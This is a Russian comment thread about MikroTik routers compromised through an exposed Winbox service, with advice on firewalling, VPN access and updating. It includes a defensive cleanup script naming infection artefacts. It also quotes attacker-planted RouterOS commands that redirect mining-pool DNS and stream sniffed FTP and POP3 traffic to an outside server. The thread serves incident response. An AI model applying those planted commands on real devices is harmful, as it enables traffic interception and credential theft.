Комментарии 36
А в каких случаях необходимо держать открытый для всех Winbox Service? Логика подсказывает, что если только это не ваш личный роутер с которым вы вольны делать все, что угодно, инструменты управления должны быть максимально защищены.
Попробуйте объяснить это некоторым оутсортерам, начальство жалобы игнорирует. Сервис открыт, потому что им «так удобно». Взломанный роутер как раз обслуживается одной из таких компаний. Заменил слово «необходимо» :)
«PortKnocking? Не, не слышал!» ))
Это на самом деле повод отказаться от услуг этой организации т.к. после этого возникают вопросы к их компетенции. Пусть свои удобства применяют в другом месте.
Есть различные способы получать удалённый доступ к инструментам управления не выставляя при этом их в открытый доступ. И это не так уж не удобно.
Есть различные способы получать удалённый доступ к инструментам управления не выставляя при этом их в открытый доступ. И это не так уж не удобно.
Вы не могли бы уточнить, я правильно понимаю, что под «сервис открыт», Вы подразумеваете, что он открыт наружу? Т.е. если вход для winbox у меня открыт только с определённого IP/диапазона IP-адресов изнутри локальной сети, то мне беспокоиться не стоит?
Я бы обновил роутеры в любом случае, может завтра в вашей локальной сети заведется троян с функционалом использования этой уязвимости. А так да, от атак извне вы защищены.
Да, обновления — это само собой. Просто был интересен вектор. Спасибо за пояснение!
А вы с 6.40.1 на какую версию обновились? А то я сегодня перепрошил на последнюю (6.42.6) и схватил кучу проблем с доступностью извне и двумя провайдерами, кажется ещё и L2TP сервер поломали
Начал проверять подшефные устройства и нашел несколько роутеров с 6.40.1, один из которых был заражен.
А почему только один оказался заражен? Остальные были подругому подключены\настроены или что там было разного в них, что только один атакован реальной угрозой?
А почему только один оказался заражен? Остальные были подругому подключены\настроены или что там было разного в них, что только один атакован реальной угрозой?
Есть же стандартный скрипт блокировки на перебор паролей RDP с блокировкой порта 3389 после 5 попыток подряд.
Что мешает переделать на порт 8291, время с 23 до 8 утра и блокировкой на месяц?
kniko.net/block-brute-force-on-microsoft-rdp-using-mikrotik-router
Что мешает переделать на порт 8291, время с 23 до 8 утра и блокировкой на месяц?
kniko.net/block-brute-force-on-microsoft-rdp-using-mikrotik-router
У меня на работе по белому ip постоянно пытаются атаковать системообразующий роутер, ну пусть пытаются… Дома с серым ip таких проблем нет.
Версию-то оси огласите :)
6.42.3
Была бы просто 6.42 — оценили бы скорость работы сканеров :)
В теме на Руборде сегодня спрашивали, почему при чистой установке CHR на ESXi у юзера admin ограничены права и где взять пароль от юзера router с полным доступом. Оказалось, роутер после запуска успел пять минут повисеть в Интернете без пароля.
Оно, конечно, не совсем в тему (хотя обсуждаемая уязвимость = по сути отсутствие пароля), но в целом тоже показательно.
В теме на Руборде сегодня спрашивали, почему при чистой установке CHR на ESXi у юзера admin ограничены права и где взять пароль от юзера router с полным доступом. Оказалось, роутер после запуска успел пять минут повисеть в Интернете без пароля.
Оно, конечно, не совсем в тему (хотя обсуждаемая уязвимость = по сути отсутствие пароля), но в целом тоже показательно.
Сейчас в публичном доступе десятки тысяч прокси socks4 на порту 4145
Команды с форума недостаточно проверяют, как я выяснил. Из того, что я нашёл, проверить, заражён ли роутер (и сразу же пофиксить) можно этими командами:
Даже скрипт написал, и закинул в pastebin.com/GAtA2mZa
# Firewall auto-fix - dangerous if you had disabled drop rules before infection (can't imagine why, though)
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Firewall drop rules were disabled"; /ip firewall filter enable [find action=drop]}
:if ([:len [/ip firewall filter find chain=input action=accept dst-port="8291"]] > 0) do={:put "Winbox had default firewall accept rule";/ip firewall filter remove [find chain=input action=accept dst-port="8291"]}
# Use this if you need to check firewall rules manually
:if ([:len [/ip firewall filter find where action=drop disabled]] > 0) do={:put "Disabled firewall drop rules:"; /ip firewall filter print where action=drop disabled}
# Winbox
:if ([/ip service get winbox disabled] != true) do={:put "Winbox was enabled"; /ip service disable winbox}
# Socks
:if ([/ip socks get port] != 1080) do={:put "Socks Port was not 1080"; /ip socks set port=1080}
:if ([/ip socks get enabled] != false) do={:put "Socks was enabled"; /ip socks set enabled=no}
:if ([:len [/ip socks access find src-address~"95.154.216.128"]] > 0) do={:put "ip socks access had rule for 95.154.216.128"; /ip socks access remove [find src-address~"95.154.216.128"]}
# Script and scheduler
:if ([:len [/system script find source~"ikrotik.php"]] > 0) do={:put "Script containing \"ikrotik.php\" found"; :foreach s in=[/system script find source~"ikrotik.php"] do={/system scheduler remove [find on-event~[/system script get $s name]]}; /system script remove [find source~"ikrotik.php"]}
# File mikrotik.php
:if ([:len [/file find name="mikrotik.php"]] + [:len [/file find name="Mikrotik.php"]] > 0) do={ :put "File [Mm]ikrotik.php was found"; /file remove [find name="mikrotik.php"]; /file remove [find name="Mikrotik.php"];}
# User "service"
:if ([:len [/user find name="service"]] > 0) do={:put "User \"service\" existed"; /user remove [find name="service"]}Даже скрипт написал, и закинул в pastebin.com/GAtA2mZa
хочу обновить свой микротик а он выдает это
ERROR: not enough disk space, 7.1MiB is required and only 7.0MiB is free
места немного не хватает
Free HDD Space 7.0 MiB
Total HDD Size 16.0 MiB
как его освободить.
делать сброс как то не хочется
ERROR: not enough disk space, 7.1MiB is required and only 7.0MiB is free
места немного не хватает
Free HDD Space 7.0 MiB
Total HDD Size 16.0 MiB
как его освободить.
делать сброс как то не хочется
Есть же Files вкладка, а так бекап необходимых данных и восстановление.
На форуме Микротика тоже жалуются на версию с 16МБ памяти. Из советов — удалить неиспользуемые пакеты, перезагрузиться и попробовать прошить еще раз, если не поможет, использовать wiki.mikrotik.com/wiki/Manual:Netinstall
Ищите fix_space.npk
forum.mikrotik.com/viewtopic.php?t=136171&start=50
forum.mikrotik.com/viewtopic.php?t=136171&start=50
там всего 2 файла
Mikrotik набирает популярность. Все больше взломщиков начинают им интересоваться.
Эта гадость, помимо вышеперечисленного, стала в последнее время добавлять еще много (50-80) записей в DNS на Микротике и включать снифер.
Для уничтожения врага (а в данном случае для недопущения заражения и для выполнения полноценного сканирования устройств в сети) нужно его изучать. У меня специально стоит один подопытный кролик, на котором они упражняются, а мне приходят логи изменений, какие новые гадости добавляют эти мерзавцы…
#
/ip dns static
add address=185.206.144.149 name=asia1.ethermine.org
add address=185.206.144.149 name=asia1.ethpool.org
add address=185.206.144.149 name=asia1.fullhashed.com
add address=....
#
/tool sniffer
set file-limit=100KiB filter-interface=all filter-ip-protocol=tcp,udp \
filter-port=ftp-data,ftp,pop3,143,1500,10000 filter-stream=yes \
streaming-enabled=yes streaming-server=37.1.207.114
#
Для уничтожения врага (а в данном случае для недопущения заражения и для выполнения полноценного сканирования устройств в сети) нужно его изучать. У меня специально стоит один подопытный кролик, на котором они упражняются, а мне приходят логи изменений, какие новые гадости добавляют эти мерзавцы…
Мы у всех наших клиентов на микротиках и не только поднимаем VPN до нашего сервера и ходим управлять исключительно через VPN. Не могу себе представить в каких условиях можно выставить голой ж0пой на мороз на весь интернет управлялку роутера.
Зарегистрируйтесь на Хабре, чтобы оставить комментарий
Новая уязвимость Mikrotik? Нет, но стоит проверить свои устройства